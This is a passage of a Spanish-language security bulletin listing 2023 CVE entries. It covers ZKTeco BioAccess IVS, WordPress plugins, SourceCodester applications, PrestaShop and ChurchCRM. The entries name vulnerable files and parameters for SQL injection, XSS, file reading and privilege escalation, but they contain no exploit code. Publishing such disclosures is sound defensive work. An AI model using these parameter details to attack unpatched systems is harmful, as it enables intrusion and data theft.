    Fecha de publicación: 28/07/2023
    Fecha de última actualización: 03/08/2023
    Se ha descubierto que la versión v2.2.0 e inferiores de University Compass contienen una vulnerabilidad de inyección de código en el componente "org.compass.core.executor.DefaultExecutorManager.configure". Esta vulnerabilidad se aprovecha pasando un argumento no comprobado.
  • Vulnerabilidad en IBM Storage Scale Container Native Storage Access (CVE-2022-43831)
    Severidad: Pendiente de análisis
    Fecha de publicación: 30/07/2023
    Fecha de última actualización: 03/08/2023
    IBM Storage Scale Container Native Storage Access de la versión 5.1.2.1 a la versión 5.1.6.1 podría permitir a un usuario local obtener privilegios escalados en un host sin la configuración de contexto de seguridad adecuada. ID de IBM X-Force: 238941.
  • Vulnerabilidad en IBM TRIRIGA (CVE-2020-4868)
    Severidad: Pendiente de análisis
    Fecha de publicación: 31/07/2023
    Fecha de última actualización: 03/08/2023
    IBM TRIRIGA v3.0, v4.0 y v4.4 podrían permitir a un atacante remoto obtener información sensible cuando se devuelve un mensaje de error técnico detallado en el navegador. Esta información podría utilizarse en ataques posteriores contra el sistema. ID de IBM X-Force: 190744.
  • Vulnerabilidad en ZKTeco BioAccess IVS (CVE-2023-38954)
    Severidad: Pendiente de análisis
    Fecha de publicación: 03/08/2023
    Fecha de última actualización: 07/08/2023
    Se ha descubierto que ZKTeco BioAccess IVS v3.3.1 contiene una vulnerabilidad de inyección SQL.
  • Vulnerabilidad en ZKTeco BioAccess IVS (CVE-2023-38955)
    Severidad: Pendiente de análisis
    Fecha de publicación: 03/08/2023
    Fecha de última actualización: 07/08/2023
    ZKTeco BioAccess IVS v3.3.1 permite a los atacantes no autenticados obtener información sensible sobre todos los dispositivos gestionados, incluyendo sus direcciones IP y nombres de dispositivos.
  • Vulnerabilidad en ZKTeco BioAccess IVS (CVE-2023-38956)
    Severidad: Pendiente de análisis
    Fecha de publicación: 03/08/2023
    Fecha de última actualización: 07/08/2023
    Una vulnerabilidad de salto de ruta en ZKTeco BioAccess IVS v3.3.1 permite a atacantes no autenticados leer archivos arbitrarios mediante el suministro de un payload manipulado.
  • Vulnerabilidad en ZKTeco BioAccess IVS (CVE-2023-38958)
    Severidad: Pendiente de análisis
    Fecha de publicación: 03/08/2023
    Fecha de última actualización: 08/08/2023
    Un problema de control de acceso en ZKTeco BioAccess IVS v3.3.1 permite a atacantes no autenticados cerrar y abrir de forma arbitraria las puertas gestionadas por la plataforma de forma remota mediante el envío de una solicitud web manipulada.
  • Vulnerabilidad en NextGen Mirth Connect (CVE-2023-37679)
    Severidad: Pendiente de análisis
    Fecha de publicación: 03/08/2023
    Fecha de última actualización: 07/08/2023
    Una vulnerabilidad de ejecución remota de comandos (RCE) en NextGen Mirth Connect v4.3.0 permite a los atacantes ejecutar comandos arbitrarios en el servidor de alojamiento.
  • Vulnerabilidad en PHP Jabbers Availability Booking Calendar (CVE-2023-4110)
    Severidad: MEDIA
    Fecha de publicación: 03/08/2023
    Fecha de última actualización: 07/08/2023
    Se ha encontrado una vulnerabilidad en PHP Jabbers Availability Booking Calendar v5.0 y se ha clasificado como problemática. Esta vulnerabilidad afecta a una funcionalidad desconocida del archivo "/index.php". La manipulación del argumento "session_id" conduce a Cross-Site Scripting (XSS). El ataque puede lanzarse de forma remota. Se asignó el identificador VDB-235957 a esta vulnerabilidad. NOTA: El proveedor fue contactado con anterioridad acerca de esta divulgación pero no respondió.
  • Vulnerabilidad en PHP Jabbers Bus Reservation System (CVE-2023-4111)
    Severidad: MEDIA
    Fecha de publicación: 03/08/2023
    Fecha de última actualización: 07/08/2023
    Se ha encontrado una vulnerabilidad en PHP Jabbers Bus Reservation System v1.1 y se ha clasificado como problemática. Este problema afecta a una funcionalidad desconocida del archivo "/index.php". La manipulación del argumento "index/pickup_id" conduce a Cross-Site Scripting (XSS). El ataque puede lanzarse de forma remota. El identificador asignado a esta vulnerabilidad es VDB-235958. NOTA: Se contactó con el proveedor con antelación acerca de esta divulgación, pero no respondió de ninguna manera.
  • Vulnerabilidad en PHPJabbers Cleaning Business Software (CVE-2023-36141)
    Severidad: Pendiente de análisis
    Fecha de publicación: 03/08/2023
    Fecha de última actualización: 07/08/2023
    Se ha encontrado una enumeración de usuarios en PHPJabbers Cleaning Business Software v1.0. Este problema se produce durante la recuperación de contraseñas, donde una diferencia en los mensajes podría permitir a un atacante determinar si el usuario es válido o no, permitiendo un ataque de fuerza bruta con usuarios válidos.
  • Vulnerabilidad en Plugin WP Ultimate CSV Importer para WordPress (CVE-2023-4139)
    Severidad: Pendiente de análisis
    Fecha de publicación: 04/08/2023
    Fecha de última actualización: 08/08/2023
    El plugin Plugin WP Ultimate CSV Importer para WordPress es vulnerable a la exposición de información sensible a través de listados de directorios debido a la falta de restricción en la indexación de carpetas de exportación en versiones hasta, e incluyendo, v7.9.8. Esto hace posible que atacantes no autenticados puedan listar y ver los archivos exportados.
  • Vulnerabilidad en Plugin WP Ultimate CSV Importer para WordPress (CVE-2023-4140)
    Severidad: Pendiente de análisis
    Fecha de publicación: 04/08/2023
    Fecha de última actualización: 08/08/2023
    El plugin Plugin WP Ultimate CSV Importer para WordPress es vulnerable a la escalada de privilegios en versiones hasta, e incluyendo, la v7.9.8 debido a una restricción insuficiente en la función "get_header_values". Esto hace posible que atacantes autenticados, con permisos mínimos como un autor, si el administrador previamente concede acceso en la configuración del plugin, modifiquen su rol de usuario suministrando el parámetro "wp_capabilities->cus1".
  • Vulnerabilidad en Plugin WP Ultimate CSV Importer para WordPress (CVE-2023-4141)
    Severidad: Pendiente de análisis
    Fecha de publicación: 04/08/2023
    Fecha de última actualización: 08/08/2023
    El plugin WP Ultimate CSV Importer para WordPress es vulnerable a la ejecución remota de código en versiones hasta, e incluyendo, la v7.9.8 a través del parámetro "->cus2". Esto permite a atacantes autenticados con permisos de nivel autor o superior, si el administrador concede previamente el acceso en la configuración del plugin, crear un archivo PHP y ejecutar código en el servidor. El autor resolvió esta vulnerabilidad eliminando la capacidad de los autores y editores para importar archivos, por favor tenga en cuenta que esto significa que la creación de archivos PHP todavía está permitida para los administrador del sitio. Utilice el plugin con precaución.
  • Vulnerabilidad en Plugin WP Ultimate CSV Importer para WordPress (CVE-2023-4142)
    Severidad: Pendiente de análisis
    Fecha de publicación: 04/08/2023
    Fecha de última actualización: 08/08/2023
    El plugin WP Ultimate CSV Importer para WordPress es vulnerable a la ejecución remota de código en versiones hasta, e incluyendo, la v7.9.8 a través del parámetro "->cus1". Esto permite a atacantes autenticados con permisos de nivel de autor o superior, si el administrador concede previamente el acceso en la configuración del plugin, ejecutar código en el servidor. El autor resolvió esta vulnerabilidad eliminando la capacidad de los autores y editores para importar archivos, por favor tenga en cuenta que esto significa que la ejecución remota de código sigue siendo posible para los administradores del sitio. Utilice el plugin con precaución.
  • CVE-2023-4182
    Severidad: ALTA
    Fecha de publicación: 06/08/2023
    Fecha de última actualización: 09/08/2023
    Se ha encontrado una vulnerabilidad, clasificada como crítica, en SourceCodester Inventory Management System v1.0. Esto afecta a una parte desconocida del archivo "edit_sell.php". La manipulación del argumento "up_pid" conduce a una inyección SQL. Es posible iniciar el ataque de forma remota. El identificador VDB-236217 fue asignado a esta vulnerabilidad.
  • CVE-2023-4183
    Severidad: MEDIA
    Fecha de publicación: 06/08/2023
    Fecha de última actualización: 09/08/2023
    Se ha encontrado una vulnerabilidad en SourceCodester Inventory Management System v1.0 y se ha clasificado como problemática. Esta vulnerabilidad afecta a código desconocido del archivo "edit_update.php" del componente "Password Handler". La manipulación del argumento "user_id" conduce a controles de acceso inadecuados. El ataque puede iniciarse de forma remota. VDB-236218 es el identificador asignado a esta vulnerabilidad.
  • CVE-2023-4184
    Severidad: ALTA
    Fecha de publicación: 06/08/2023
    Fecha de última actualización: 09/08/2023
    Se ha encontrado una vulnerabilidad en SourceCodester Inventory Management System v1.0 y se ha clasificado como crítica. Este problema afecta a algún procesamiento desconocido del archivo "sell_return.php". La manipulación del argumento "pid" conduce a una inyección de SQL. El ataque puede ser iniciado remotamente. El identificador asociado de esta vulnerabilidad es VDB-236219.
  • CVE-2023-4185
    Severidad: MEDIA
    Fecha de publicación: 06/08/2023
    Fecha de última actualización: 09/08/2023
    Se ha encontrado una vulnerabilidad en SourceCodester Online Hospital Management System v1.0. Se ha clasificado como crítica. Se ve afectada una función desconocida del archivo "patientlogin.php". La manipulación del argumento "loginid/password" conduce a una inyección SQL. Es posible lanzar el ataque de forma remota. El exploit ha sido revelado al público y puede ser utilizado. El identificador de esta vulnerabilidad es VDB-236220.
  • CVE-2023-4186
    Severidad: MEDIA
    Fecha de publicación: 06/08/2023
    Fecha de última actualización: 10/08/2023
    Se ha encontrado una vulnerabilidad en SourceCodester Pharmacy Management System v1.0. Ha sido declarada como crítica. Esta vulnerabilidad afecta a una funcionalidad desconocida del archivo "manage_website.php". La manipulación conduce a una carga sin restricciones. El ataque puede lanzarse de forma remota. El exploit ha sido revelado al público y puede ser utilizado. Se ha asignado a esta vulnerabilidad el identificador "VDB-236221".
  • CVE-2023-4191
    Severidad: MEDIA
    Fecha de publicación: 06/08/2023
    Fecha de última actualización: 10/08/2023
    Se ha encontrado una vulnerabilidad, clasificada como crítica, en SourceCodester Resort Reservation System v1.0. Este problema afecta a una funcionalidad desconocida del archivo "index.php". La manipulación de la página de "argument" conduce a la inclusión de archivos. El ataque puede ser lanzado remotamente. El exploit ha sido revelado al público y puede ser utilizado. VDB-236234 es el identificador asignado a esta vulnerabilidad.
  • CVE-2023-4192
    Severidad: MEDIA
    Fecha de publicación: 06/08/2023
    Fecha de última actualización: 09/08/2023
    Se ha encontrado una vulnerabilidad, clasificada como crítica, en SourceCodester Resort Reservation System v1.0. Esto afecta a una parte desconocida del archivo "manage_user.php". La manipulación del argumento "id" conduce a una inyección SQL. Es posible iniciar el ataque de forma remota. El exploit ha sido revelado al público y puede ser utilizado. El identificador asociado de esta vulnerabilidad es VDB-236235.
  • CVE-2023-4193
    Severidad: MEDIA
    Fecha de publicación: 06/08/2023
    Fecha de última actualización: 10/08/2023
    Se ha encontrado una vulnerabilidad en SourceCodester Resort Reservation System v1.0 y se ha clasificado como crítica. Esta vulnerabilidad afecta a código desconocido del archivo "view_fee.php". La manipulación del argumento "id" conduce a una inyección SQL. El ataque puede ser iniciado remotamente. El exploit ha sido revelado al público y puede ser utilizado. El identificador de esta vulnerabilidad es VDB-236236.
  • CVE-2023-4200
    Severidad: MEDIA
    Fecha de publicación: 07/08/2023
    Fecha de última actualización: 10/08/2023
    Se ha encontrado una vulnerabilidad en SourceCodester Inventory Management System v1.0 y se ha clasificado como crítica. Esta vulnerabilidad afecta a código desconocido del archivo "product_data.php". La manipulación del argumento "columns[1][data]" conduce a una inyección SQL. El ataque puede iniciarse de forma remota. El exploit ha sido revelado al público y puede ser utilizado. VDB-236290 es el identificador asignado a esta vulnerabilidad.
  • CVE-2023-4201
    Severidad: MEDIA
    Fecha de publicación: 07/08/2023
    Fecha de última actualización: 10/08/2023
    Se ha encontrado una vulnerabilidad en SourceCodester Inventory Management System v1.0 y se ha clasificado como crítica. Este problema afecta a algún procesamiento desconocido del archivo "ex_catagory_data.php". La manipulación del argumento "columns[1][data]" conduce a una inyección SQL. El ataque puede iniciarse de forma remota. El exploit ha sido revelado al público y puede ser utilizado. El identificador asociado de esta vulnerabilidad es VDB-236291.
  • CVE-2023-39527
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/08/2023
    Fecha de última actualización: 09/08/2023
    PrestaShop es una aplicación web de comercio electrónico de código abierto. Las versiones anteriores a 1.7.8.10, 8.0.5, y 8.1.1 son vulnerables a Cross-Site Scripting (XSS) a través del método "isCleanHTML". Las versiones 1.7.8.10, 8.0.5 y 8.1.1 contienen un parche. No se conocen soluciones.
  • CVE-2023-39528
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/08/2023
    Fecha de última actualización: 09/08/2023
    PrestaShop es una aplicación web de comercio electrónico de código abierto. Antes de la versión 8.1.1, el método "displayAjaxEmailHTML" puede ser utilizado para leer cualquier archivo en el servidor, potencialmente incluso fuera del proyecto si el servidor no está configurado correctamente. La versión 8.1.1 contiene un parche para este problema. No se conocen soluciones.
  • CVE-2023-39530
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/08/2023
    Fecha de última actualización: 09/08/2023
    PrestaShop es una aplicación web de comercio electrónico de código abierto. Antes de la versión 8.1.1, era posible eliminar archivos del servidor a través de la API "CustomerMessage". La versión 8.1.1 contiene un parche para este problema. No hay soluciones conocidas.
  • CVE-2023-36926
    Severidad: Pendiente de análisis
    Fecha de publicación: 07/08/2023
    Fecha de última actualización: 15/08/2023
    Debido a la falta de comprobación de autenticación en SAP Host Agent - versión 7.22, un atacante no autenticado puede establecer un parámetro no documentado a un valor de compatibilidad particular y a su vez llamar a funciones de lectura. Esto permite al atacante recopilar información no sensible sobre el servidor. No hay impacto en la integridad o disponibilidad.
  • CVE-2023-38768
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/08/2023
    Fecha de última actualización: 09/08/2023
    Una vulnerabilidad de inyección SQL en ChurchCRM v5.0.0 permite a un atacante remoto obtener información sensible a través del parámetro "PropertyID" dentro de "/QueryView.php".
  • CVE-2023-38769
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/08/2023
    Fecha de última actualización: 09/08/2023
    Una vulnerabilidad de inyección SQL en ChurchCRM v5.0.0 permite a un atacante remoto obtener información sensible a través de los parámetros "searchstring" y "searchwhat" dentro de "/QueryView.php".
  • CVE-2023-38770
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/08/2023
    Fecha de última actualización: 09/08/2023
    Una vulnerabilidad de inyección SQL en ChurchCRM v5.0.0 permite a un atacante remoto obtener información sensible a través del parámetro "group" dentro de "/QueryView.php".
  • CVE-2023-38771
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/08/2023
    Fecha de última actualización: 09/08/2023
    Una vulnerabilidad de inyección SQL en ChurchCRM v5.0.0 permite a un atacante remoto obtener información sensible a través del parámetro "volopp" dentro de "/QueryView.php".
  • CVE-2023-38773
    Severidad: Pendiente de análisis
    Fecha de publicación: 08/08/2023
    Fecha de última actualización: 09/08/2023
    Una vulnerabilidad de inyección SQL en ChurchCRM v5.0.0 permite a un atacante remoto obtener información sensible a través de los parámetros "volopp1" y "volopp2" dentro de "/QueryView.php".
  • CVE-2023-4239
    Severidad: Pendiente de análisis
    Fecha de publicación: 09/08/2023
    Fecha de última actualización: 15/08/2023
    El plugin Real Estate Manager para WordPress es vulnerable a la escalada de privilegios en versiones hasta, e incluyendo, la 6.7.1 debido a una restricción insuficiente en la función "rem_save_profile_front". Esto hace posible que atacantes autenticados, con permisos mínimos como un suscriptor, modifiquen su rol de usuario suministrando el parámetro "wp_capabilities" durante una actualización de perfil.